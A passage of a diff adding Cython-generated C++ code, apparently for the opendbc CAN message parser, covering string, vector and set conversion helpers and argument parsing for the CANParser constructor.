__pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":49 + * + * @cname("__pyx_convert_PyBytes_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyBytes_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyBytes_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyBytes_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":55 + * + * @cname("__pyx_convert_PyByteArray_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyByteArray_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyByteArray_FromStringAndSize(s.data(), s.size()) + * + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyByteArray_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyByteArray_string_to_py_std__in_string", 0); + + /* "string.to_py":56 + * @cname("__pyx_convert_PyByteArray_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyByteArray_string_to_py_std__in_string(const string& s): + * return __Pyx_PyByteArray_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyByteArray_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 56, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":55 + * + * @cname("__pyx_convert_PyByteArray_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyByteArray_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyByteArray_FromStringAndSize(s.data(), s.size()) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyByteArray_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "vector.from_py":45 + * + * @cname("__pyx_convert_vector_from_py_std_3a__3a_string") + * cdef vector[X] __pyx_convert_vector_from_py_std_3a__3a_string(object o) except *: # <<<<<<<<<<<<<< + * cdef vector[X] v + * for item in o: + */ + +static std::vector __pyx_convert_vector_from_py_std_3a__3a_string(PyObject *__pyx_v_o) { + std::vector __pyx_v_v; + PyObject *__pyx_v_item = NULL; + std::vector __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + Py_ssize_t __pyx_t_2; + PyObject *(*__pyx_t_3)(PyObject *); + PyObject *__pyx_t_4 = NULL; + std::string __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_vector_from_py_std_3a__3a_string", 0); + + /* "vector.from_py":47 + * cdef vector[X] __pyx_convert_vector_from_py_std_3a__3a_string(object o) except *: + * cdef vector[X] v + * for item in o: # <<<<<<<<<<<<<< + * v.push_back(item) + * return v + */ + if (likely(PyList_CheckExact(__pyx_v_o)) || PyTuple_CheckExact(__pyx_v_o)) { + __pyx_t_1 = __pyx_v_o; __Pyx_INCREF(__pyx_t_1); __pyx_t_2 = 0; + __pyx_t_3 = NULL; + } else { + __pyx_t_2 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_v_o); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 47, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 47, __pyx_L1_error) + } + for (;;) { + if (likely(!__pyx_t_3)) { + if (likely(PyList_CheckExact(__pyx_t_1))) { + if (__pyx_t_2 >= PyList_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(1, 47, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 47, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } else { + if (__pyx_t_2 >= PyTuple_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(1, 47, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 47, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } + } else { + __pyx_t_4 = __pyx_t_3(__pyx_t_1); + if (unlikely(!__pyx_t_4)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(1, 47, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_4); + } + __Pyx_XDECREF_SET(__pyx_v_item, __pyx_t_4); + __pyx_t_4 = 0; + + /* "vector.from_py":48 + * cdef vector[X] v + * for item in o: + * v.push_back(item) # <<<<<<<<<<<<<< + * return v + * + */ + __pyx_t_5 = __pyx_convert_string_from_py_std__in_string(__pyx_v_item); if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 48, __pyx_L1_error) + try { + __pyx_v_v.push_back(((std::string)__pyx_t_5)); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(1, 48, __pyx_L1_error) + } + + /* "vector.from_py":47 + * cdef vector[X] __pyx_convert_vector_from_py_std_3a__3a_string(object o) except *: + * cdef vector[X] v + * for item in o: # <<<<<<<<<<<<<< + * v.push_back(item) + * return v + */ + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "vector.from_py":49 + * for item in o: + * v.push_back(item) + * return v # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = __pyx_v_v; + goto __pyx_L0; + + /* "vector.from_py":45 + * + * @cname("__pyx_convert_vector_from_py_std_3a__3a_string") + * cdef vector[X] __pyx_convert_vector_from_py_std_3a__3a_string(object o) except *: # <<<<<<<<<<<<<< + * cdef vector[X] v + * for item in o: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("vector.from_py.__pyx_convert_vector_from_py_std_3a__3a_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_pretend_to_initialize(&__pyx_r); + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_item); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "vector.to_py":66 + * + * @cname("__pyx_convert_vector_to_py_double") + * cdef object __pyx_convert_vector_to_py_double(const vector[X]& v): # <<<<<<<<<<<<<< + * if v.size() > PY_SSIZE_T_MAX: + * raise MemoryError() + */ + +static PyObject *__pyx_convert_vector_to_py_double(std::vector const &__pyx_v_v) { + Py_ssize_t __pyx_v_v_size_signed; + PyObject *__pyx_v_o = NULL; + Py_ssize_t __pyx_v_i; + PyObject *__pyx_v_item = 0; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + Py_ssize_t __pyx_t_3; + Py_ssize_t __pyx_t_4; + Py_ssize_t __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_vector_to_py_double", 0); + + /* "vector.to_py":67 + * @cname("__pyx_convert_vector_to_py_double") + * cdef object __pyx_convert_vector_to_py_double(const vector[X]& v): + * if v.size() > PY_SSIZE_T_MAX: # <<<<<<<<<<<<<< + * raise MemoryError() + * v_size_signed = v.size() + */ + __pyx_t_1 = (__pyx_v_v.size() > ((size_t)PY_SSIZE_T_MAX)); + if (unlikely(__pyx_t_1)) { + + /* "vector.to_py":68 + * cdef object __pyx_convert_vector_to_py_double(const vector[X]& v): + * if v.size() > PY_SSIZE_T_MAX: + * raise MemoryError() # <<<<<<<<<<<<<< + * v_size_signed = v.size() + * + */ + PyErr_NoMemory(); __PYX_ERR(1, 68, __pyx_L1_error) + + /* "vector.to_py":67 + * @cname("__pyx_convert_vector_to_py_double") + * cdef object __pyx_convert_vector_to_py_double(const vector[X]& v): + * if v.size() > PY_SSIZE_T_MAX: # <<<<<<<<<<<<<< + * raise MemoryError() + * v_size_signed = v.size() + */ + } + + /* "vector.to_py":69 + * if v.size() > PY_SSIZE_T_MAX: + * raise MemoryError() + * v_size_signed = v.size() # <<<<<<<<<<<<<< + * + * o = PyList_New(v_size_signed) + */ + __pyx_v_v_size_signed = ((Py_ssize_t)__pyx_v_v.size()); + + /* "vector.to_py":71 + * v_size_signed = v.size() + * + * o = PyList_New(v_size_signed) # <<<<<<<<<<<<<< + * + * cdef Py_ssize_t i + */ + __pyx_t_2 = PyList_New(__pyx_v_v_size_signed); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 71, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_v_o = ((PyObject*)__pyx_t_2); + __pyx_t_2 = 0; + + /* "vector.to_py":76 + * cdef object item + * + * for i in range(v_size_signed): # <<<<<<<<<<<<<< + * item = v[i] + * Py_INCREF(item) + */ + __pyx_t_3 = __pyx_v_v_size_signed; + __pyx_t_4 = __pyx_t_3; + for (__pyx_t_5 = 0; __pyx_t_5 < __pyx_t_4; __pyx_t_5+=1) { + __pyx_v_i = __pyx_t_5; + + /* "vector.to_py":77 + * + * for i in range(v_size_signed): + * item = v[i] # <<<<<<<<<<<<<< + * Py_INCREF(item) + * PyList_SET_ITEM(o, i, item) + */ + __pyx_t_2 = PyFloat_FromDouble((__pyx_v_v[__pyx_v_i])); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 77, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_XDECREF_SET(__pyx_v_item, __pyx_t_2); + __pyx_t_2 = 0; + + /* "vector.to_py":78 + * for i in range(v_size_signed): + * item = v[i] + * Py_INCREF(item) # <<<<<<<<<<<<<< + * PyList_SET_ITEM(o, i, item) + * + */ + Py_INCREF(__pyx_v_item); + + /* "vector.to_py":79 + * item = v[i] + * Py_INCREF(item) + * PyList_SET_ITEM(o, i, item) # <<<<<<<<<<<<<< + * + * return o + */ + PyList_SET_ITEM(__pyx_v_o, __pyx_v_i, __pyx_v_item); + } + + /* "vector.to_py":81 + * PyList_SET_ITEM(o, i, item) + * + * return o # <<<<<<<<<<<<<< + * + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_o); + __pyx_r = __pyx_v_o; + goto __pyx_L0; + + /* "vector.to_py":66 + * + * @cname("__pyx_convert_vector_to_py_double") + * cdef object __pyx_convert_vector_to_py_double(const vector[X]& v): # <<<<<<<<<<<<<< + * if v.size() > PY_SSIZE_T_MAX: + * raise MemoryError() + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("vector.to_py.__pyx_convert_vector_to_py_double", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_o); + __Pyx_XDECREF(__pyx_v_item); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "set.to_py":166 + * + * @cname("__pyx_convert_unordered_set_to_py_uint32_t") + * cdef object __pyx_convert_unordered_set_to_py_uint32_t(const cpp_set[X]& s): # <<<<<<<<<<<<<< + * return {v for v in s} + * + */ + +static PyObject *__pyx_convert_unordered_set_to_py_uint32_t(std::unordered_set const &__pyx_v_s) { + uint32_t __pyx_7genexpr__pyx_v_v; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + std::unordered_set ::const_iterator __pyx_t_2; + uint32_t __pyx_t_3; + PyObject *__pyx_t_4 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_unordered_set_to_py_uint32_t", 0); + + /* "set.to_py":167 + * @cname("__pyx_convert_unordered_set_to_py_uint32_t") + * cdef object __pyx_convert_unordered_set_to_py_uint32_t(const cpp_set[X]& s): + * return {v for v in s} # <<<<<<<<<<<<<< + * + */ + __Pyx_XDECREF(__pyx_r); + { /* enter inner scope */ + __pyx_t_1 = PySet_New(NULL); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 167, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_v_s.begin(); + for (;;) { + if (!(__pyx_t_2 != __pyx_v_s.end())) break; + __pyx_t_3 = *__pyx_t_2; + ++__pyx_t_2; + __pyx_7genexpr__pyx_v_v = __pyx_t_3; + __pyx_t_4 = __Pyx_PyInt_From_uint32_t(__pyx_7genexpr__pyx_v_v); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 167, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (unlikely(PySet_Add(__pyx_t_1, (PyObject*)__pyx_t_4))) __PYX_ERR(1, 167, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + } /* exit inner scope */ + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "set.to_py":166 + * + * @cname("__pyx_convert_unordered_set_to_py_uint32_t") + * cdef object __pyx_convert_unordered_set_to_py_uint32_t(const cpp_set[X]& s): # <<<<<<<<<<<<<< + * return {v for v in s} + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("set.to_py.__pyx_convert_unordered_set_to_py_uint32_t", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "opendbc/can/parser_pyx.pyx":31 + * string dbc_name + * + * def __init__(self, dbc_name, signals, checks=None, bus=0, enforce_checks=True): # <<<<<<<<<<<<<< + * if checks is None: + * checks = [] + */ + +/* Python wrapper */ +static int __pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_1__init__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_1__init__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + PyObject *__pyx_v_dbc_name = 0; + PyObject *__pyx_v_signals = 0; + PyObject *__pyx_v_checks = 0; + PyObject *__pyx_v_bus = 0; + PyObject *__pyx_v_enforce_checks = 0; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__init__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_dbc_name,&__pyx_n_s_signals,&__pyx_n_s_checks,&__pyx_n_s_bus,&__pyx_n_s_enforce_checks,0}; + PyObject* values[5] = {0,0,0,0,0}; + values[2] = ((PyObject *)Py_None); + values[3] = ((PyObject *)__pyx_int_0); + values[4] = ((PyObject *)Py_True); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 5: values[4] = __Pyx_Arg_VARARGS(__pyx_args, 4); + CYTHON_FALLTHROUGH; + case 4: values[3] = __Pyx_Arg_VARARGS(__pyx_args, 3); + CYTHON_FALLTHROUGH; + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_dbc_name)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 31, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_signals)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 31, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__init__", 0, 2, 5, 1); __PYX_ERR(0, 31, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_checks); + if (value) { values[2] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 31, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 3: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_bus); + if (value) { values[3] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 31, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 4: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_enforce_checks); + if (value) { values[4] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 31, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__init__") < 0)) __PYX_ERR(0, 31, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 5: values[4] = __Pyx_Arg_VARARGS(__pyx_args, 4); + CYTHON_FALLTHROUGH; + case 4: values[3] = __Pyx_Arg_VARARGS(__pyx_args, 3); + CYTHON_FALLTHROUGH; + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_dbc_name = values[0]; + __pyx_v_signals = values[1]; + __pyx_v_checks = values[2]; + __pyx_v_bus = values[3]; + __pyx_v_enforce_checks = values[4]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__init__", 0, 2, 5, __pyx_nargs); __PYX_ERR(0, 31, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("opendbc.can.parser_pyx.CANParser.__init__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_7opendbc_3can_10parser_pyx_9CANParser___init__(((struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *)__pyx_v_self), __pyx_v_dbc_name, __pyx_v_signals, __pyx_v_checks, __pyx_v_bus, __pyx_v_enforce_checks); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} +static PyObject *__pyx_gb_7opendbc_3can_10parser_pyx_9CANParser_8__init___2generator(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value); /* proto */ + +/* "opendbc/can/parser_pyx.pyx":88 + * unchecked = signal_addrs - checked_addrs + * if len(unchecked): + * err_msg = ", ".join(f"{self.address_to_msg_name[addr].decode()} ({hex(addr)})" for addr in unchecked) # <<<<<<<<<<<<<< + * raise RuntimeError(f"Unchecked addrs: {err_msg}") + * + */ + +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_8__init___genexpr(PyObject *__pyx_self, PyObject *__pyx_genexpr_arg_0) { + struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr *__pyx_cur_scope; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("genexpr", 0); + __pyx_cur_scope = (struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr *)__pyx_tp_new_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr(__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr, __pyx_empty_tuple, NULL); + if (unlikely(!__pyx_cur_scope)) { + __pyx_cur_scope = ((struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr *)Py_None); + __Pyx_INCREF(Py_None); + __PYX_ERR(0, 88, __pyx_L1_error) + } else { + __Pyx_GOTREF((PyObject *)__pyx_cur_scope); + } + __pyx_cur_scope->__pyx_outer_scope = (struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ *) __pyx_self; + __Pyx_INCREF((PyObject *)__pyx_cur_scope->__pyx_outer_scope); + __Pyx_GIVEREF((PyObject *)__pyx_cur_scope->__pyx_outer_scope); + __pyx_cur_scope->__pyx_genexpr_arg_0 = __pyx_genexpr_arg_0; + __Pyx_INCREF(__pyx_cur_scope->__pyx_genexpr_arg_0); + __Pyx_GIVEREF(__pyx_cur_scope->__pyx_genexpr_arg_0); + { + __pyx_CoroutineObject *gen = __Pyx_Generator_New((__pyx_coroutine_body_t) __pyx_gb_7opendbc_3can_10parser_pyx_9CANParser_8__init___2generator, NULL, (PyObject *) __pyx_cur_scope, __pyx_n_s_genexpr, __pyx_n_s_init___locals_genexpr, __pyx_n_s_opendbc_can_parser_pyx); if (unlikely(!gen)) __PYX_ERR(0, 88, __pyx_L1_error) + __Pyx_DECREF(__pyx_cur_scope); + __Pyx_RefNannyFinishContext(); + return (PyObject *) gen; + } + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("opendbc.can.parser_pyx.CANParser.__init__.genexpr", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_DECREF((PyObject *)__pyx_cur_scope); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_gb_7opendbc_3can_10parser_pyx_9CANParser_8__init___2generator(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value) /* generator body */ +{ + struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr *__pyx_cur_scope = ((struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr *)__pyx_generator->closure); + PyObject *__pyx_r = NULL; + PyObject *__pyx_t_1 = NULL; + Py_ssize_t __pyx_t_2; + PyObject *(*__pyx_t_3)(PyObject *); + PyObject *__pyx_t_4 = NULL; + Py_ssize_t __pyx_t_5; + Py_UCS4 __pyx_t_6; + uint32_t __pyx_t_7; + PyObject *__pyx_t_8 = NULL; + PyObject *__pyx_t_9 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("genexpr", 0); + switch (__pyx_generator->resume_label) { + case 0: goto __pyx_L3_first_run; + default: /* CPython raises the right error here */ + __Pyx_RefNannyFinishContext(); + return NULL; + } + __pyx_L3_first_run:; + if (unlikely(!__pyx_sent_value)) __PYX_ERR(0, 88, __pyx_L1_error) + __pyx_r = PyList_New(0); if (unlikely(!__pyx_r)) __PYX_ERR(0, 88, __pyx_L1_error) + __Pyx_GOTREF(__pyx_r); + if (unlikely(!__pyx_cur_scope->__pyx_genexpr_arg_0)) { __Pyx_RaiseUnboundLocalError(".0"); __PYX_ERR(0, 88, __pyx_L1_error) } + if (likely(PyList_CheckExact(__pyx_cur_scope->__pyx_genexpr_arg_0)) || PyTuple_CheckExact(__pyx_cur_scope->__pyx_genexpr_arg_0)) { + __pyx_t_1 = __pyx_cur_scope->__pyx_genexpr_arg_0; __Pyx_INCREF(__pyx_t_1); __pyx_t_2 = 0; + __pyx_t_3 = NULL; + } else { + __pyx_t_2 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_cur_scope->__pyx_genexpr_arg_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 88, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 88, __pyx_L1_error) + } + for (;;) { + if (likely(!__pyx_t_3)) { + if (likely(PyList_CheckExact(__pyx_t_1))) { + if (__pyx_t_2 >= PyList_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 88, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 88, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } else { + if (__pyx_t_2 >= PyTuple_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 88, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 88, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } + } else { + __pyx_t_4 = __pyx_t_3(__pyx_t_1); + if (unlikely(!__pyx_t_4)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(0, 88, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_4); + } + __Pyx_XGOTREF(__pyx_cur_scope->__pyx_v_addr); + __Pyx_XDECREF_SET(__pyx_cur_scope->__pyx_v_addr, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + __pyx_t_4 = 0; + __pyx_t_4 = PyTuple_New(4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 88, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = 0; + __pyx_t_6 = 127; + if (unlikely(!__pyx_cur_scope->__pyx_outer_scope->__pyx_v_self)) { __Pyx_RaiseClosureNameError("self"); __PYX_ERR(0, 88, __pyx_L1_error) } + __pyx_t_7 = __Pyx_PyInt_As_uint32_t(__pyx_cur_scope->__pyx_v_addr); if (unlikely((__pyx_t_7 == ((uint32_t)-1)) && PyErr_Occurred())) __PYX_ERR(0, 88, __pyx_L1_error) + __pyx_t_8 = __Pyx_decode_cpp_string((__pyx_cur_scope->__pyx_outer_scope->__pyx_v_self->address_to_msg_name[__pyx_t_7]), 0, PY_SSIZE_T_MAX, NULL, NULL, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 88, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_6 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_8) > __pyx_t_6) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_8) : __pyx_t_6; + __pyx_t_5 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_8); + 